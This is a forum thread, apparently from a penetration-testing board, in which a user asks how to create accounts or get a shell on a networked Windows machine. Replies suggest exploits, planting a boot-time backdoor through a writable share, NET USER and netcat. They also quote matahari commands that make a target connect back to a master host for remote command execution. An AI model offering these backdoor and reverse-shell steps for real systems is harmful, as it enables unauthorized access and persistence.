Remote Users
I am curious. Once you find your target machine on the network(this being on my network). Is there a way to create a user remotely from, say, an smb share command line or anything like that? If this is not possible is there a way to get a command line from the target machine other than using an exploit? I apologize if this answer has already been answered. I searched the forums pretty extensively and did not find any results. Thanks a lot for your time.
The key to immortality is first living a life worth remembering.
Yes it is possible to create a user remotely through the File Sharing service.
Option 1. Use an exploit that matches the computer with the hole.
Option 2. If no public exploit exists, find a way to exploit the service yourself.
Option 3. Includes no exploiting. If the appropriate files are shared, you could have some backdoor execute at boot.
Good luck
- Poul Wittig
Originally Posted by Deathray
Thanks a lot for the post. I have a share available. Is there a backdoor that will allow me to spawn a command prompt?
The key to immortality is first living a life worth remembering.
plenty, but you can have a look to a thing i like called matahari and included in bt3
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
Usage examples
Suppose you have a target machine (target.foo.com) behind a firewall and you want to be able to execute commands from a master machine (master.bar.com). The scenario could be set up as follows:TEST THIS ON YOUR OWN LAB... I NEVER ENCOURAGES ILLEGAL ACTIVITIES
- Exec on target machine:
./matahari.py -c master.bar.com -T polite.Be sure to keep process running even after logging off (nohup and screen are your friends)- Exec anytime on master machine:
./matahari.py -s target.foo.com
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
You guys make things so difficult sometimes. If you've already exploited the network and the machine, all you'd need to do is use the NET USER command from another winders boxen.
If you have Winders, go to a command prompt and type NET /? it's actually a fairly fun little thing that's built in.
A third party security audit is the IT equivalent of a colonoscopy. It's long, intrusive, very uncomfortable, and when it's done, you'll have seen things you really didn't want to see, and you'll never forget that you've had one.
Guys - if he owns the box already why not just have him drop netcat on the remote host and he can shell away all day long!
yep same principle as old netcat but i prefer matahari for personal reasons...
but do nearly the same
Watch your back, your packetz will belong to me soon... xD
BackTrack : Giving Machine Guns to Monkeys since 2006
Thanks a lot for the replies guys. I will go try them out tonight.
The key to immortality is first living a life worth remembering.
I have never used matahari so I will have to try it out. I have been using NC for years .. rather like going to a dance - you leave with the one that brought you.
Posting Permissions
